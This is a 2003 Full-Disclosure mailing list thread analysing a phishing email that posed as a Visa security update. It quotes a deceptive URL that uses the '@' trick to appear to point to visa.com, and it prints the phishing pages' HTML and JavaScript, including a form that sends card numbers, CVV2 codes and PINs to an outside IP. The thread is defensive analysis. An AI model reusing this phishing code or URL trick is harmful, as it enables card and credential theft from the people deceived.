My bad, it was just pointed out to me that redirection between @ and %01@ are different things. I don't mean to take shots at the Xforce guys.
Thanks guys. >-----Original Message----- >From: [EMAIL PROTECTED] >[mailto:[EMAIL PROTECTED] On Behalf Of Gary Flynn >Sent: Tuesday, December 23, 2003 9:30 AM >To: Mauro Flores >Cc: [EMAIL PROTECTED] >Subject: Re: [Full-Disclosure] visa XSS? > > > >Mauro Flores wrote: > >> I receive this mail today, the funny stuff is that when you >click on the >> link, you execute: >> >http://www.visa.com:UserSession=2f6q9uuu88312264trzzz55884495&u seroption=SecurityUpdate&[EMAIL PROTECTED]/~gotier/verified_by_visa.htm >> >> I don't have a Visa card and I don't like that 64.21.80.2 >which is not a >> Visa IP, AFAIK. >> Anyone else receive it?? > >Yeah. We just got one here. I missed the first part of this thread >so I don't know if I'm repeating stuff. > >The original email came from an address registered in Korea. > >Although the present web site redirects to the VISA site, if >you look at >the source you'll find: > ><HTML><HEAD> ><TITLE>Secure with Visa</TITLE> ><META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> ><meta http-equiv='refresh' content='0; >url=http://www.usa.visa.com/personal/privacy_policy/?it=ft_/per sonal/secure_with_visa/index.html'> ><BODY> > <script language="JavaScript"> ><!-- > > >// alert("popali"); > window.name="spec"; > window.open("http://64.21.80.2/~gotier/r.php";, 'Visa', >"resizable=no,scrollbars=no,width=425,height=198"); >// window.focus(); >//--> ></script> ></BODY></HTML> > >And that r.php is a phish: > >Please, enter your data info!<html> ><head> ><title>Enter your data</title> ></head> ><body> ><br> ><form method=post action=http://64.21.80.2/~gotier/r.php> >Credit Card No. <input type=text name=cc value=''><br> >CVV2 <input type=text name=cvv2 value=''><br> >PIN-ATM CODE: <input type=text name=pin value=''><br> >Expiration Date: month : <select name=month> ><option value=01>01 ><option value=02>02 ><option value=03>03 ><option value=04>04 ><option value=05>05 ><option value=06>06 ><option value=07>07 ><option value=08>08 ><option value=09>09 ><option value=10>10 ><option value=11>11 ><option value=12>12 ></select> year : <select name=year> ><option value=2003>2003 ><option value=2004>2004 ><option value=2005>2005 ><option value=2006>2006 ><option value=2007>2007 ><option value=2008>2008 ><option value=2009>2009 ><option value=2010>2010 ><option value=2011>2011 ><option value=2012>2012 ></select> ><br><br> ><input type=submit value='Send'); ></form> ></body> ></html> > >-- >Gary Flynn >Security Engineer - Technical Services >James Madison University > > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.netsys.com/full-disclosure-charter.html > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
